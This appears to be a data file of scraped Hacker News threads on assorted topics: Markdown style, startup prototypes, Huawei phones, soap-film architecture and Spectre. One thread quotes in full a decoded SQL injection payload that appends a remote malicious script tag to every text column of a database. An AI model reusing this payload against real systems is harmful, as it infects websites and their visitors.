text
stringlengths 44
776k
| meta
dict |
---|---|
Show HN: Markdown Style Guide - cirosantilli
http://www.cirosantilli.com/markdown-style-guide
======
cirosantilli
I'd love any kind of feedback. For more "precise", "well defined" issues, I
propose that you open an issue at: [https://github.com/cirosantilli/markdown-
style-guide/issues](https://github.com/cirosantilli/markdown-style-
guide/issues) as it is more manageable.
------
amedstudent
I don't get the point of ignoring definition lists for your reason. The ones
you proposed are ugly.
If definition lists aren't supported then it's an inferior breed of markdown
and should be discontinued where possible
| {
"pile_set_name": "HackerNews"
} |
SQL "development" gone horribly wrong... - avner
http://boston.craigslist.org/gbs/sof/742662737.html
======
dizm
Decoded:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT
a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script
src=[http://www.suppadw.com/b.js></script>'''](http://www.suppadw.com/b.js></script>'''));''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor
------
PStamatiou
shared hosting? get your own box, turn off apache for a while and go through
code with a fine tooth comb.
~~~
ajross
SQL injection attacks have nothing to do with whether they are on a shared box
or running in a locked down cage. If they have any hope of fixing this mess,
they need to start from advice that helps, not voodoo.
~~~
PStamatiou
I just meant if they had their own box they would have more control over it..
they said they had to wait for a support guy with perms to do the db restores.
------
sabat
\- all web input needs to run thru the same filter \- that filter disallows
SQL keywords \- you're done
If this guy wasn't on a shared host, he could just install mod_security and
its default config should take care of it. Presuming Apache of course.
~~~
LogicHoleFlaw
I think ANDrew, TOny, SETh, and BYron might have problems with that filter.
~~~
sabat
They might if the programmer didn't have the sense to surround the keywords
with word boundary markers. You know, something like %20SET%20 etc. I do this
successfully with mod_security, and a good regex kit will let you do this
easily.
| {
"pile_set_name": "HackerNews"
} |
Designing for the iPhone is a refreshing experience - (37signals) - dawie
http://www.37signals.com/svn/posts/475-designing-for-the-iphone-is-a-refreshing-experience
======
jsjenkins168
The problem is that the "constraints" are controlled by one company. Its not
an open standard others can share.
History has shown this is bad and stunts innovation (think MSFT)
| {
"pile_set_name": "HackerNews"
} |
Why We're Missing Our Best Chance for Gender Parity - hugs
https://devmynd.com/blog/2015-2-mind-the-gap
======
emiliobumachar
"When I'm hiring, I have an HR intern (or the external recruiter) strip
anything that could indicate gender or race from the résumés before they get
their initial evaluation. For the ones that make the first cut, I have the
recruiter print out code from Github, with the username redacted. This has
resulted in a tremendous increase in the number of women who make it through
to an actual interview."
In orchestras, there was a tremendous increase in the number of women when the
practice of having candidates play their instruments invisible to the judges
became widespread.
------
cpks
Let me give an alternative explanation, championed by Philip Greenspun for
women in science jobs: Startup jobs suck, and women are better at recognizing
it (scroll past the description of science jobs to "Why do American men
(actually boys) do it?"):
[http://philip.greenspun.com/careers/women-in-
science](http://philip.greenspun.com/careers/women-in-science)
There are no economics by which working at a startup makes sense over a
Facebook or a Google. You work longer hours, and make substantially less.
Unless you're a founder, even in the event of a successful exit, the stock
options will generally barely cover the cost of the paper they're written on.
Early employees don't come out competitive with Google until you see billion-
plus dollar exits.
Philip's claim was that men tend to make decisions based on testosterone-
fueled machismo, and go into areas considered "hard-core" like theoretical
math, which rationally, are a waste of time and make no sense to study. As he
phrases it, young men make the decision based on:
1\. young men strive to achieve high status among their peer group 2\. men
tend to lack perspective and are unable to step back and ask the question "is
this peer group worth impressing?"
This matches my anecdotal experience as well. Women tend to make more rational
decisions, and pursue fields with a higher return-on-investment. Men tend to
make irrational decisions, and either realize it later (with colossal
failures, such as science jobs), or rationalize it later (e.g. "I learned a
lot" without really comparing to the alternative -- a job with formal
mentorship processes, and both pay and work/life to allow time for pet
projects and formal study).
If Philip's claim is correct -- and it does match my anecdotal experience --
the way to draw more women into startups would be to make them appealing to
rational players. Typically, an early employee ends up with a fraction-of-a-
percent equity at exit (and at best, low single-digit percent at joining).
Equity is allocated in numbers (5000 shares) rather than percent, in a
successful attempt to confuse.
Is it a full explanation for 2% vs. 28%? Probably not. Bias is surely part of
the equation as well. I have no idea what the split is, but I'd be shocked if
either explained the gap fully, and I'd be equally shocked if either were
insignificant.
~~~
eurleif
>Philip's claim was that men tend to make decisions based on testosterone-
fueled machismo, and go into areas considered "hard-core" like theoretical
math, which rationally, are a waste of time and make no sense to study.
If no one did theoretical math or startups, the world wouldn't advance. There
wouldn't be a Facebook or a Google to work at. People can rationally pursue
goals beyond their own financial interests.
~~~
cpks
1\. You're confusing theoretical math vs. applied math. Google doesn't benefit
from algebraic topology.
2\. Startups would exist -- just not as many. The cost would be slightly
higher; they'd have to pay employees either fair salaries, or give fair levels
of equity. The current situation -- long hours, low salary, crooked options --
would not persist.
~~~
eurleif
>You're confusing theoretical math vs. applied math. Google doesn't benefit
from algebraic topology.
Not yet, maybe. But it does benefit from number theory, which was considered
to have no practical applications until people realized we could do encryption
with it.
~~~
cpks
Two ways to look at it:
1\. Return on investment. Every hour spent on applied math generates a lot
more applications (not to mention elegant mathematics) than the same spent on
theoretical math. Theoretical math has about as much value as knitting and
crochet. Does someone occasionally come up with something of value? Sure. Does
it have more value than any other hobby? Not really.
2\. With encryption in particular, Diffie-Hellmen is simple enough that public
key would have been created regardless of research in theoretical math.
Furthermore, most of the people developing such (including Diffie, Hellmen,
Merkle, Rivest, Shamir, Adleman, etc.) have applied backgrounds. Indeed, most
are computer scientists, rather than mathematicians. The same goes for
cryptographic protocols, doubly so. Symmetric encryption, in contrast, does
build a _little_ bit on theoretical math, but it's also just an arms race.
More knowledge about number theory helps both cryptography and cryptanalysis
about equally. There's no reason to believe that more number theory makes us
in any way more secure. Cryptography itself would exist without number theory
(indeed, history is a bit fuzzy as to whether something like the scytale or
number theory came first, and regardless, there is no reason to believe one
fed the other).
| {
"pile_set_name": "HackerNews"
} |
Huawei Mate 30 phones launch without Google apps - amaccuish
https://www.bbc.co.uk/news/technology-49754376
======
AdmiralAsshat
Would've been a golden opportunity to get a billion users onto F-Droid's
store, but, more likely Huawei will simply launch with their own, tightly-
integrated "Huawei app store". It may even be _worse_ from a security
perspective, since there is zero expectation that the apps Huawei provides
through their own store should be FLOSS.
~~~
Animats
Now app developers have a big incentive to avoid Google Play Services and run
on open-source Android. That lets them run on Google, Huawei, and F-Droid
platforms.
Time for a dev forum on migrating away from Google Play Services.
~~~
mooman219
You could say the same about Vulkan vs Metal, or Chrome vs the world, or
Windows vs the world. The bulk of developers are going to target the subset of
technologies that let them do what they want to do in the easiest way possible
while targeting the largest userbase. I assume this isn't going to change the
playing field in a significant way.
~~~
close04
Usually a good incentive for devs is a higher cut of the sales. But I’m not
sure how much Chinese users usually contribute to a dev’s revenue stream
compared to US or EU users for example.
I remember reading a while ago that iOS is an attractive OS to target because
the users tend to spend more in apps than the average Android users. If the
average Chinese users spend even less it may be a disincentive. Not sure if
this is still the case.
------
sandworm101
A phone without Google or Apple? I'm no fan of Huawei but credit where credit
is due.
I'm still waiting for a reasonable phone that will allow me to install my own
OS and, more importantly, dump the OS and go with something else when it
annoys me.
~~~
missosoup
Yeah, because a phone imaged by an entity controlled by the CCP is better than
a phone without Google or Apple.
I'm no supporter of either Apple or Goog, but applauding a mass spyware device
from the CCP would be satire a couple years ago.
It's not like they have a track record of subverting phones for targeted
genocide or anything[1]
[1]
[https://www.schneier.com/blog/archives/2019/09/massive_iphon...](https://www.schneier.com/blog/archives/2019/09/massive_iphone_.html)
~~~
xwolfi
Dude the US spied on the undersea fiber to steal contract from companies in my
(democratic) country.
Say what you want about the chinese, but they're not the only ones playing
that game.
~~~
truculent
> but they're not the only ones playing that game.
The original comment is literally comparing Huawei favouably to US
counterparts, though
------
bubblethink
>"It forced us to use the HMS [Huawei Mobile Services] core."
This is the major failure I see here. Basically, no one wants Huawei's blobby
bloatware with system level privileges any more than Google's blobby bloatware
with system level privileges. If the world thinks that you are a Chinese
spying company, you do not combat that by shipping more crap. They had a good
opportunity to either extend AOSP or to make HMS open source. Instead, they
imitate Google poorly.
~~~
tinus_hn
There’s plenty of people of simply don’t care about that, they just want a
cheap and pretty phone.
------
Synaesthesia
Quite impressive hardware. The fact that 5G is integrated in the SoC is a
first, display looks great too.
I’m sure you can still use apps like YouTube and Gmail via the phones browser,
that’s what I do on my iPhone.
~~~
Havoc
Yeah bought a Huawei tablet & thought same. Good bang per buck on hardware
even with questionable associations.
------
sreyaNotfilc
After seeing the iPhone11 Pro, Pixel 4, and the Mate 30 Pro I have to say that
the Mate 30 implemented the 3 camera the best. Its less of an eyesore being in
the center of the device instead of the top left corner.
Also, the bezel around it makes it look like a device that's a phone and a
camera instead of "hiding the fact" that its a phone that happens to have
photo capabilities. I really like the design.
Too bad for the lack of Android/Google apps, for I would have considered
getting one.
~~~
lunchables
>Its less of an eyesore being in the center of the device instead of the top
left corner.
I genuinely have no idea what the back of my phone looks like. All I'm
concerned with is the quality of the photos it takes.
~~~
sreyaNotfilc
I somewhat agree. Yes, the back isn't that noticeable when actually using it.
But its noticeable now. Even to the point where people I know who loves their
iPhones say that its "ugly".
Apple is not known to make "ugly" devices. Their devices are practical and
engineered thoughtfully.
Having the camera in the top left corner as opposed to the center seems like a
mistake to me. Especially since they are promoting the camera to be a
significant upgrade. Put it front and center!
Apple's history on device (at least with Jobs) always was have a fully
functional revolutionary machine that was easy to use and beautiful inside and
out. They've been that way since the Macintosh. The look was much user-
friendly and approachable. They even signed the inside of the box as if they
are presenting a piece of art. Even the font-face they introduced was to
promote artistry in the technical world.
My point is, the iPhone 11 is an amazing device, but the look of their biggest
new feature, the cameras, does not fit well with their history of artistic
prowess. Steve Jobs would have never OKed this design placement.
------
fakeslimshady
Now all this means is the user needs to install themselves rather than use the
pre-install bloatware. A clean start might actually be preferrable for a lot
of people
------
sharpneli
I find it hilarious when reading news like these to remember that the official
stance of US government is that their national security is endangered if that
phone ships with Google Play.
EDIT: It actually is national security
([https://www.google.fi/amp/s/www.cnet.com/google-
amp/news/tru...](https://www.google.fi/amp/s/www.cnet.com/google-
amp/news/trump-says-he-doesnt-want-to-do-business-with-huawei-due-to-national-
security-threat/))
~~~
mosselman
I am not an expert, but I doubt that this is an accurate characterisation of
the reasons for the ban. Isn’t this more about intellectual property issues
and economic disagreements?
~~~
HenryBemis
I think it is mostly political. When one uses Google Maps, he tells USA's
3-letter-agencies when they are. If Huawei replaces Google Maps with "Huawei
Maps" then USA stops getting that info, and China gets that info. Now apply
the same for emails, text messages, etc.
I believe that even "innocuous" games (started playing AFKArena lately)
collect the IP address of my phone and tell the lovely Chinese gov who I am,
where I am, etc. (AFKArena policies have the word Tencent a lot in them).
~~~
mda
You imply security agencies have direct uncontrolled online access to Google
maps personal data today, this is not true. There is due process to access
private data and you can always have the option to enable, disable, delete it.
Lets stick to the facts.
~~~
HenryBemis
You imply that they don't. If the Wikileaks/Snowden story, the AT&T (room
641A) story taught us anything is that we cannot place any reliance to any due
process and that 3-letter agencies harvest anything they can, any way they
can, without any respect to privacy (big laughter here) and due process.
I am not trashing security agencies. I am merely stating that lines in the
sand never seem to stopped them before and most likely won't stop them now (or
in the future).
Whether it could be the AT&T case, or a bribed sys/net admin, "they" want it
all and they got the budgets to get it done.
------
jankotek
> firm had set aside $1bn (£801m) to encourage developers to make their apps
> compatible
It also launched without Google Services. This could be great push towards
completely open sourced Android platform.
~~~
rasz
Reminds me of a time MS was paying hundreds to thousands of dollars for
garbage calculator/flashlight Windows Phone apps.
------
ThinkBeat
Well I think that makes the phone more attractive. Something that doesn't
report everything I do to Google.
Huawei should market the shit out of that.
Blackphone (maybe used to) sell a hardened version of the Android phone
without the google spyware but version 2 was really expensive and made in
small quantities.
This Mate30 will be mass-produced. They could make this the favorite privacy
phone. (Well privacy from the US surveillance state)
~~~
frequentnapper
Yeah instead you get a device that reports everything to the Chinese
surveillance state which is much worse.
------
tibbydudeza
Excellent specs and cheap compared to the competition.
I am sure some enterprising folks on XDA will come up with a nifty easy
utility to "googlyfi" your new Huawei phone.
Also won't surprise me if some phone shops will take the initiative and do it
out of the box before selling it to you.
~~~
commoner
As long as Huawei continues to ship phones with locked bootloaders that can't
be unlocked, that is simply not going to happen.
[https://www.xda-developers.com/xda-huawei-decision-stop-
boot...](https://www.xda-developers.com/xda-huawei-decision-stop-bootloader-
unlocking)
[https://www.xda-developers.com/huawei-mate-30-google-play-
st...](https://www.xda-developers.com/huawei-mate-30-google-play-store-
challenges)
You won't be able to root Huawei phones, much less customize the stock OS to
any meaningful extent. You also won't be able to change the OS (to something
like LineageOS).
------
thefounder
I guess that's a feature..plus the iPhone camera seems a joke in comparison
with mate pro.
~~~
bdcravens
Ditto for the Galaxy Note 10
------
lph
Did Huawei not see what happened with the Amazon Fire Phone or Windows Phone?
If you launch a phone with an anemic ecosystem, it will fail.
~~~
dragonelite
They are pressured to do this, if the US wasn't so dickish about it they would
just release a certified Android.
------
londons_explore
Will it have a locked bootloader?
Previous Huawei phones have all had a fairly robustly locked bootloader. Now
it seems there is quite some incentive for them to make the bootloader
unlockable to make inserting GMSCore easier...
One could imagine an underground network of US based people reflashing these
phones to have Google services.
~~~
bubblethink
You don't need an unlockable bootloader for that. They ship stub packages that
can be updated later by the user [1].
[1]: [https://www.xda-developers.com/huawei-mate-30-google-play-
st...](https://www.xda-developers.com/huawei-mate-30-google-play-store-
challenges/)
------
xster
[https://twitter.com/cybnox/status/1174722533377085444](https://twitter.com/cybnox/status/1174722533377085444)
This is probably a key conversation. In other words, we don't really know yet
what part of GMS dependent apps will or will not work.
------
GFischer
It´s going to kill overseas sales for them. Both me and my gf have Huawei
phones, but the next phone will be a Xiaomi.
Fortunately the U.S. didn't kill all Chinese manufacturers, Samsung and the
rest are overpriced compared to them.
------
sajithdilshan
This is quite interesting. I assume there are 3rd party alternatives for most
of the essential Google apps which lets you access the google service like
Gmail or YouTube
~~~
fspeech
You can access GMail or YouTube from your browser. I don’t install the apps on
my phone.
~~~
HenryBemis
The worse soy on our Android phones is Google Play Services. For some magical
reason when I firewall the Google Play Services I stop receiving ANY
notifications (Signal, emails etc.). For some reason all these are routed
through Google. I wonder how much of a coincidence/mishap is that in the
architecture.
Does anyone know why, if I can bypass it?
~~~
dannyw
Play Services does handles all push notifications. The 'some reason' is
battery life, because your phone shouldn't maintain 30 long lived connections.
From the privacy aspect, I believe all notifications are end to end encrypted
actually. Same as Apple.
~~~
HenryBemis
Encrypted, but that's on transit. Does Google read everything, or the only
thing transfered is the alert and NOT the Signal/text/WhatsApp message itself?
~~~
smush
Signal is e2ee so Google Cloud Messaging should only get the alert itself,
then the encrypted message is downloaded from the server and decoded on
device.
------
chvid
27 w wireless charging!
~~~
josho
I assume this is going to generate excessive heat. My understanding is that
batteries age poorly from heat stress. So, I am curious what routine 27w
wireless charging is going to do for battery life.
~~~
14
I was just looking and could not find anything concrete but did see it was
expected to use a non-removable battery. That is not a huge problem as long as
they designed it to be fairly easily changed and if that is the case then I
would gladly trade battery life for fast charging. I guess time will tell on
this one but good question.
------
jdofaz
Why are the Facebook apps not blocked by the blacklist?
------
Zenst
For some this will be bad news, but for others - this they will view as good
news. So mixed blessings, though for you common core users - they will see
this as bad.
However - eventually services and the phone will be separate and eventually
end up with phones like we did with the browser selection option thrust upon
you giving you the choice, even if you choose to go with what you had
originally.
Fun times ahead and in the end, I feel that the consumer will get a better
deal in the end and as geeks who love to hack away at our phones - may get an
easier life.
------
doorslammer
i'm no expert but it's a check list of where google can be found:
1.Your phone Operating system 2\. gallery manager. 3\. E-mail. 4\. Google
music player. 5\. google video player. 6\. Youtube app.
there's more but your time is precious and maybe you allready know all these
but don't care.
let's imagine your phone was a person.. he had like gazillion types of cancer.
from birth.
------
KirkNY
Video of our team's analysis on this subject:
[https://youtu.be/3bl4pXd2Sqc](https://youtu.be/3bl4pXd2Sqc)
~~~
mcraiha
Might be a good idea to mention what is your team.
~~~
askl56
Applico and they don't seem to understand how the Chinese phone market works.
| {
"pile_set_name": "HackerNews"
} |
Great roundup of the best PS3 games in its swan-song year... - adambunker
http://www.redbull.com/uk/en/games/stories/1331622505248/ps4-ps3-vita-sony-playstation-gaming
======
samworm
This is nowhere close to the PS3's swansong. The PS2 was on sale until Jan of
/This Year/! So the PS3 will be around for a long time yet...
------
thelonelygod
This would have been great for me this morning. My local used game store was
doing a half off all games and I have just bought a ps3.
| {
"pile_set_name": "HackerNews"
} |
Invalidate this startup idea - 500 dollar prototype - padseeker
I had an idea based on my many conversations with non techies with web or mobile app based ideas. It seems they always spend way too much on building their idea from scratch, even if they use offshore resources OR they forgo it completely as it is too hard to manage.<p>I've lost track of the amount of times I've put palm to forehead when I listen to a non-techie tell me how they spent thousands building their idea from scratch, when they could have used using that was already build - like a wordpress plugin, a rails or django clone with some extra work, or goodness knows what else. But they never even thought to ask around about other avenues.<p>So here is the idea - A proposer (a non techie type) posts their idea, and a bunch of technically savvy hacker news types propose ways to build the prototype for 500 or less, and people up/down vote stuff like stackexchange. Perhaps use crowdsourcing for others to up/down vote the proposals. The winning proposal wins and builds it for 500, minus a nominal fee that goes to the company.<p>The proposer can always continue using the builder of the prototype after the prototype is built, or they could take it to someone else. And 500 bucks is not chump change but it isn't a huge investment on the part of the proposer.<p>Just upvote this post if you would consider putting your hat in the ring to build a prototype for $500, or at least vote in other proposals.
======
bitcoder
I guess the concept is ultimately a 2-sided market of 'proposers' and
'builders', so the challenge would be balancing them effectively.
I think its unlikely you'd ever have a problem with too many builders and not
enough ideas. I think the challenge will be attracting builders (i.e.
developers) who are willing to build these prototypes.
As you've probably heard, developers are in high demand right now. A hacker
worth his salt is probably charging at least $100/hr, so $500 for a prototype
doesn't sound that attractive.
------
stevejalim
Affordable prototypes make sense, but what about the $500 level setting false
expectations for the cost of the production-quality app? If you're pitching
this at non-techies, you'll also have to get them over the hump of realising
that a lash-up is easily an order of magnitude cheaper than a decent, real-
world-robust version.
"Hey, WTF are you doing quoting me £5000 for a full build of this app? I had
the prototype done for $500 and it does almost as much as the real one I
want."
------
xoail
Hate it. A decent developer based out of United States will not be able to
work out the prototype for anywhere near $500. That means you open doors for
off-shore devs/companies to bid and try winning the project, acting exactly
like other hundreds of freelance sites. No one will up-vote proposals of the
competition. I don't see how this is different from any other freelance
marketplace sites out there other than putting a hard limit of $500 max. The
poster still has to work hard in preparing the requirement of the prototype,
answering questions and managing deliverables. Prototype also has
expectations, designs, creatives, tests and what not. It's better to just hire
a local person/friend. In general I feel freelance market places are hurting
the economy of the country.
------
DanBC
A neat idea. It's a nice fit with something like Bountify (you'd use bountify
for the smaller things, and your site for the larger projects).
Here are a couple of questions. These aren't meant to be bashing or knocking!
Sorry if they sound that way.
* How will you cope if an idiot claims to be able to do something, and wins, and then makes an awful mess of things?
* How does licensing work? If Ann writes some code for Bob who owns the code? (And if Ann is working at some place that claims ownership of all her code, do they own this?)
~~~
padseeker
you could I guess have a process - for custom apps the winner needs to post
their code on github, and others can review the deployed app on heroku? There
are plenty of holes with that as a technical person could pose as a non techie
then grab the code and make off with it. But the proposer's money would be in
escrow, and if the finished product works and, oh i dunno if the other hackers
give it the stamp of approval....
Which that is a whole other bag of worms, if enough hackers are vindictive
enough to vote a working idea down. I'm making this up as I go along. I'm
willing to be swayed in a different direction.
------
soupangel
My main problem with this proposal, is that WE all know that $500 buys you a
rough prototype or a proof-of-concept. But a quick search through Elance or
Odesk shows that there are many many potential clients who seriously expect a
fully-polished product for that amount. What happens to the poor contractor
when the client comes back with a huge changelist, which they're honoured to
complete before getting paid?
Having said that, there was a pretty successful version of this idea
implemented for designers a while back.
~~~
soupangel
99designs.com was the link, took me a while to remember
------
padseeker
Thanks for all your comments - this post has certainly generated a bit of
interest and there are some interesting ideas I'm going to have to consider.
Although 11 points (at 9:30 EST) is hardly justification for building the
thing out. If I get to 50 maybe I would consider it.
The funniest part is to see the comments coming from each end, the Dev person
saying "I can get $100 per hour, why would I do it" versus the business person
who counters "I can get it built for less than $20 per hour on ODesk". I think
there is an opportunity here. It's not easy to find and manage an offshore
resource, and there are not that many people who can justify paying $100 an
hour.
------
ashraful
This is something that I've toyed with. I wanted to offer a service to build
an MVP for as low as $999. Living in a third-world country where a lot for
very talented developer work for a lot less is an advantage that I had.
On my first try, my value proposition wasn't clear enough and I clearly needed
to spend more time on the whole presentation. However, I think the idea still
has merit, and its something I'll try again.
------
jamesjguthrie
I quite like this idea and could maybe see myself posting on a site like this.
What I don't like is the "500 or less" part, at that point it becomes a
bidding war and will inevitably be taken over by India-based devs just like
every other coder for hire site.
------
alokhar
Cool idea, but one question. Are you talking about developers ripping off non-
techies buy building the idea from scratch, or the non-techies themselves
trying to build it from scratch because they don't know better alternatives?
------
maxbrown
I think this becomes more compelling if you offer multiple price points and
try to set delivery expectations at each level. I'm not sure how much can be
built at $500 while maintaining reasonable $/hr rates.
------
kennywinker
Sounds like a subreddit, not a website. </irony>
~~~
padseeker
yeah, I think that is a valid criticism. Actually it feels a lot closer to a
Stack Exchange site, not including the way to transfer a payment from one
person to another. I like how stack exchange tracks reputations and allows
people to up/down vote answers to questions.
------
vlokshin
Hmmmm... LaunchSky.com definitely comes to mind
------
Mz
I am a non-techie. I _think_ I need to learn the technical part to make my
thingamawhop. I don't think it will fly otherwise. Maybe my situation is
unique. Maybe not. What if it is not? What if a lot of non-techies need to
learn and grow with the process of trying to breathe life into their idea?
What if your idea amounts to the guy who snipped the cocoon to make things
easier on the emerging butterfly, thereby tragically crippling it and
permanently denying it the ability to ever fly?
~~~
bradleysmith
I am a non-techie that also believes I ought to learn the technical part to
breathe life into my thingamawhop.
I would still love the ability to know if someone could make it right now
right now for $500.
If you snip the cocoon by putting it on doitfor500.com, that's on you, right?
Where there's a want, there's a product. I'd post my thingamawhop.
~~~
Mz
He asked to be invalidated. I was giving him the feedback he requested. I am
someone who routinely either gets useless pats on the head or hatred from
people. I can't fucking get anyone to engage me in meaty discussion of the
issues. And that fact is helping to ensure that my thingamawhop will be
stillborn or miscarried entirely.
Perhaps he doesn't appreciate being given what he asked for. Perhaps like
everyone else on planet earth, he will not take my feedback seriously and will
merely be defensive like it is a personal attack and not a well meaning,
honest critique. And, gee, that's on him what he does with it. But he did ask
for people to try to poke holes in his idea, presumably on the theory that it
would help him uncover weaknesses and thereby improve the darn thing. But
maybe it was just pc bs, like most of the blather on the face of the planet.
~~~
padseeker
If you think it is invalid that is a perfectly acceptable response. You made a
point and I countered. No need to get hostile Mz. I'm just glad you took the
time to respond. You're feedback is appreciated, even if the answer is "your
idea isn't worth building".
I want to hear what your thingamawop is - please share. Maybe this is the
start of doitfor500, and you get the first version for free. Or at least we
put you on the right path if you do it yourself. I'm really curious now what
it is.
~~~
Mz
You seem to have missed my point entirely. I gave you the feedback you
requested. That doesn't mean "it isn't worth building". That means I respect
you enough to help you try to find the weaknesses before you build the damn
thing, in hopes that it will hurt less should you actually launch. And if you
can't come to terms with that, life will get really painful when you do go
public with it.
My thingamawhop: I nearly died just about twelve years ago. Then I was
diagnosed with "atypical cystic fibrosis". I have spent the last twelvish
years getting well when the entire world thinks that is impossible. I would
like to write a simulation -- aka "game" -- to more effectively share my
mental model. But it might never happen. I get accused of having Munchhausen
Syndrome rather than cf. Most people with cf have made it abundantly clear
that they would rather die a slow torturous death than speak to me at all. And
I have been lovingly called a "troll" by the good people of hn for trying to
get feedback to resolve my problems.
Sorry if I am a tad raw over the whole thing. This kind of bullshit has gone
on for years. It likely won't end. Ever.
Best of luck with your idea.
| {
"pile_set_name": "HackerNews"
} |
Windows 10 to be released by Microsoft in July - aymenim
http://www.bbc.com/news/technology-32962830
======
deciplex
That's nice.
In fact I just learned that Microsoft is now in the business of installing
malware on their own damn operating system (perhaps I'm late to the party on
this). No, I'm not talking about them pre-installing Candy Crush on Windows 10
- that's just a shitty P2W skinner box app - not technically malware. Rather
I'm talking about the notification that is appearing in the system tray of
every fucking installation of Windows 7, Windows 8, and Windows 8.1 now. Yes,
you can remove it (by uninstalling the update responsible for it KB3035583 and
then also hiding it), and no, you shouldn't have to do this.
I don't think I want to install any more software from these brain-damaged
assholes.
| {
"pile_set_name": "HackerNews"
} |
Translating music into visual art - vmarsy
http://www.notesartstudio.com/about.html
======
vmarsy
As pointed out in _What Musical Notes Can Look Like_ [1], Music is sound,
there can be multiple ways to represent it visually. The link above is such an
example.
From the About section: _This artwork is created by a mathematical algorithm
that converts an entire piece of music from its natural domain of time and
frequency into a domain of space and color, relying on Fourier transforms,
graph theory, sparse matrix methods, and force-directed graph visualization,
to create visual music._
[1]
[https://news.ycombinator.com/item?id=12159224](https://news.ycombinator.com/item?id=12159224)
| {
"pile_set_name": "HackerNews"
} |
Frie Otto – Modeling with Soap Films (c. 1961) [video] - rfreytag
https://www.youtube.com/watch?v=-IW7o25NmeA
======
lenticular
Soap bubbles behave kind of like catenary curves. They want to minimize their
surface area (which has potential energy), but also want to reduce their
gravitational potential energy. The surface tension of bubbles behaves much
like elasticity of thin solids.
It makes sense then that this would be a useful model for shapes of elastic
structures whose thickness is much smaller than the horizontal length scale.
Such structures should be built to be in an energetically favorable
configuration, otherwise they'll sag like a loosely-pitched tent.
~~~
buckthundaz
Yes, have a look at this study for visuals:
[https://wewanttolearn.wordpress.com/2012/11/14/plateaus-
laws...](https://wewanttolearn.wordpress.com/2012/11/14/plateaus-laws-soap-
bubbles-grasshopper/)
~~~
theoh
That is a nice Grasshopper project. This application of Plateau's laws is
limited to an idealised and very regular geometric situation, though. More
general problems can be solved with the Surface Evolver, which, like Frei
Otto's form finding experiments, can evolve membranes (starting from a certain
initial configuration and geometric constraints) under gravity and particular
bending energies.
[http://facstaff.susqu.edu/brakke/evolver/](http://facstaff.susqu.edu/brakke/evolver/)
The Willmore energy is a neat way to get smooth or "fair" bubble-like
surfaces.
[https://en.wikipedia.org/wiki/Willmore_energy](https://en.wikipedia.org/wiki/Willmore_energy)
------
mpweiher
1\. Frei Otto. (not Frie)
[https://en.wikipedia.org/wiki/Frei_Otto](https://en.wikipedia.org/wiki/Frei_Otto)
2\. He did the Olympic Stadion in Munich
(Yup, the Soap Films)
[http://stadiumdb.com/pictures/stadiums/ger/olympiastadion_mu...](http://stadiumdb.com/pictures/stadiums/ger/olympiastadion_munchen/olympiastadion_munchen01.jpg)
[https://en.wikipedia.org/wiki/Olympiastadion_(Munich)](https://en.wikipedia.org/wiki/Olympiastadion_\(Munich\))
3\. I live in a house created (in part) by him, the Ökohaus Berlin
[https://www.the-offbeats.com/articles/building-together-
the-...](https://www.the-offbeats.com/articles/building-together-the-okohaus-
frei-otto-collective-improvisation/)
| {
"pile_set_name": "HackerNews"
} |
Can you infer the purpose of these tools? - pookleblinky
http://farmtools101.blogspot.com/
======
jmah
Wow:
<http://farmtools101.blogspot.com/>
<http://toolanswers101.blogspot.com/>
I think they win the prize for best (ab)use of free Blogger accounts. And
reading the answers page alone is better than the quiz, unless you already
have some agricultural knowledge.
~~~
diN0bot
mos def. this was fascinating. made me question what i see in 3d printers when
more public hackershops and forges could enabled so much!
------
sireat
Unless they blatantly scraped the information from somewhere, this is indeed
the best splog I've seen, actually interesting enough to read.
| {
"pile_set_name": "HackerNews"
} |
Spectre and the end of langsec - robin_reala
http://wingolog.org/archives/2018/01/11/spectre-and-the-end-of-langsec
======
forapurpose
I'm starting to consider whether this reflects a larger failure in the
industry/community: Traditionally, many of us (I'd say almost all) have been
focused on security at the OS level and above. We've assumed that the
processor and related hardware are safe and reliable.
However, below the OS level much new technology has been introduced that has
greatly increased the attack surface, from processor performance enhancements
such as branch prediction to subsystems such as Intel ME. I almost feel like
Intel broke a social compact that their products would be predictable, safe
commodities on which I can build my systems. But did those good old days ever
really exist?. And of course, Intel naturally doesn't want their products to
be commodities, which likely is why they introduced these new features.
Focusing on OS and application security may be living in a fantasy world, one
I hesitate to give up because the reality is much more complex. What good are
OpenBSD's or Chrome's security efforts, for example, if the processor on which
they run is insecure and if there are insecure out-of-band management
subsystems? Why does an attacker need to worry about the OS?
(Part of the answer is that securing the application and OS makes attacks more
expensive; at least we can reduce drive-by JavaScript exploits. But now the OS
and application are a smaller part of the security puzzle, and not at all
sufficient.)
~~~
gibson99
The issue of hardware security really has been ignored too long in favor of
the quest for performance enhancement. Perhaps there is a chance now for
markets to encourage production of simplified processors and instruction sets
that are designed with the same philosophy as OpenBSD. I would imagine
companies and governments around the globe should have developed a new
interest in secure IT systems with news about major exploits turning up every
few months now it seems.
------
lclarkmichalek
Really not the end. The existence of issues that cannot be addressed via
'langsec' does not imply that we should give up on 'langsec'. There will be
more security issues due to buffer overflows than there will be CPU bugs this
year. More importantly, there will be orders of magnitudes more users with
data compromised via buffer overflows, compared to CPU bugs.
~~~
alxlaz
The author does not seem to mean "the end of langsec" as in "everyone will
give up on it", but rather the end of a period characterized, and not
incorrectly, by the opinion that a safe programming language guarantees the
absence of unintentional unsafe behaviour. In short, that things which, within
this "langsec framework", one could prove to be impossible, turn out to be
possible in practice; in the author's own words:
"The basis of language security is starting from a programming language with a
well-defined, easy-to-understand semantics. From there you can prove (formally
or informally) interesting security properties about particular programs. [..]
But the Spectre and Meltdown attacks have seriously set back this endeavor.
One manifestation of the Spectre vulnerability is that code running in a
process can now read the entirety of its address space, bypassing invariants
of the language in which it is written, even if it is written in a "safe"
language. [...] Mathematically, in terms of the semantics of e.g. JavaScript,
these attacks should not be possible. But practically, they work. "
This is not really news. The limits of formal methods were, in my opinion,
